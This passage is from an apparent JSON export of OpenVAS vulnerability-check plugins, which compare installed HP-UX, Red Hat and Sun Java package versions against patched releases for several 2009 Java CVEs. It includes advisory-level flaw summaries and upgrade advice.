rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1647.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR11 Java release. All running instances\nof IBM Java must be restarted for this update to take effect.", "modified": "2018-04-06T00:00:00", "published": "2009-12-14T00:00:00", "id": "OPENVAS:136141256231066471", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066471", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1647", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1647.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1647 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1647.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR11 Java release. All running instances\nof IBM Java must be restarted for this update to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66471\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1647\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1647.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/developerworks/java/jdk/alerts/\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm\", rpm:\"java-1.5.0-ibm~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-demo\", rpm:\"java-1.5.0-ibm-demo~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-devel\", rpm:\"java-1.5.0-ibm-devel~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-javacomm\", rpm:\"java-1.5.0-ibm-javacomm~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-jdbc\", rpm:\"java-1.5.0-ibm-jdbc~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-plugin\", rpm:\"java-1.5.0-ibm-plugin~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-src\", rpm:\"java-1.5.0-ibm-src~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm\", rpm:\"java-1.5.0-ibm~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-accessibility\", rpm:\"java-1.5.0-ibm-accessibility~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-demo\", rpm:\"java-1.5.0-ibm-demo~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-devel\", rpm:\"java-1.5.0-ibm-devel~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-javacomm\", rpm:\"java-1.5.0-ibm-javacomm~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-jdbc\", rpm:\"java-1.5.0-ibm-jdbc~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-plugin\", rpm:\"java-1.5.0-ibm-plugin~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-src\", rpm:\"java-1.5.0-ibm-src~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1647.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR11 Java release. All running instances\nof IBM Java must be restarted for this update to take effect.", "modified": "2017-07-12T00:00:00", "published": "2009-12-14T00:00:00", "id": "OPENVAS:66471", "href": "http://plugins.openvas.org/nasl.php?oid=66471", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1647", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1647.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1647 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1647.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR11 Java release. All running instances\nof IBM Java must be restarted for this update to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(66471);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1647\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1647.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/developerworks/java/jdk/alerts/\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm\", rpm:\"java-1.5.0-ibm~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-demo\", rpm:\"java-1.5.0-ibm-demo~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-devel\", rpm:\"java-1.5.0-ibm-devel~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-javacomm\", rpm:\"java-1.5.0-ibm-javacomm~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-jdbc\", rpm:\"java-1.5.0-ibm-jdbc~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-plugin\", rpm:\"java-1.5.0-ibm-plugin~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-src\", rpm:\"java-1.5.0-ibm-src~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm\", rpm:\"java-1.5.0-ibm~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-accessibility\", rpm:\"java-1.5.0-ibm-accessibility~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-demo\", rpm:\"java-1.5.0-ibm-demo~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-devel\", rpm:\"java-1.5.0-ibm-devel~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-javacomm\", rpm:\"java-1.5.0-ibm-javacomm~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-jdbc\", rpm:\"java-1.5.0-ibm-jdbc~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-plugin\", rpm:\"java-1.5.0-ibm-plugin~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-src\", rpm:\"java-1.5.0-ibm-src~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-13T12:59:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "This host is installed with Sun Java JDK/JRE and is prone to\n multiple vulnerabilities.", "modified": "2017-11-08T00:00:00", "published": "2009-11-13T00:00:00", "id": "OPENVAS:800975", "href": "http://plugins.openvas.org/nasl.php?oid=800975", "type": "openvas", "title": "Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_sun_java_jre_mult_vuln_nov09_lin.nasl 7699 2017-11-08 12:10:34Z santu $\n#\n# Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (LinUx)\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation allows remote attacker to execute arbitrary code,\n gain escalated privileges, bypass security restrictions and cause denial\n of service attacks inside the context of the affected system.\n Impact Level: System/Application.\";\ntag_affected = \"Sun Java JDK/JRE 6 prior to 6 Update 17\n Sun Java JDK/JRE 5 prior to 5 Update 22\n Sun Java JDK/JRE 1.4.x prior to 1.4.2_24\n Sun Java JDK/JRE 1.3.x prior to 1.3.1_27 on Linux.\";\ntag_insight = \"Multiple flaws occur due to,\n - Error when decoding 'DER' encoded data and parsing HTTP headers.\n - Error when verifying 'HMAC' digests.\n - Integer overflow error in the 'JPEG JFIF' Decoder while processing\n malicious image files.\n - A buffer overflow error in the 'setDiffICM()' and 'setBytePixels()'\n functions in the Abstract Window Toolkit (AWT).\n - Unspecified error due to improper parsing of color profiles of images.\n - A buffer overflow error due to improper implementation of the\n 'HsbParser.getSoundBank()' function.\n - Three unspecified errors when processing audio or image files.\";\ntag_solution = \"Upgrade to JDK/JRE version 6 Update 17 or later,\n http://java.sun.com/javase/downloads/index.jsp\n OR\n Upgrade to JDK/JRE version 5 Update 22\n http://java.sun.com/javase/downloads/index_jdk5.jsp\n OR\n Upgrade to JDK/JRE version 1.4.2_24\n http://java.sun.com/j2se/1.4.2/download.html\n OR\n Upgrade to 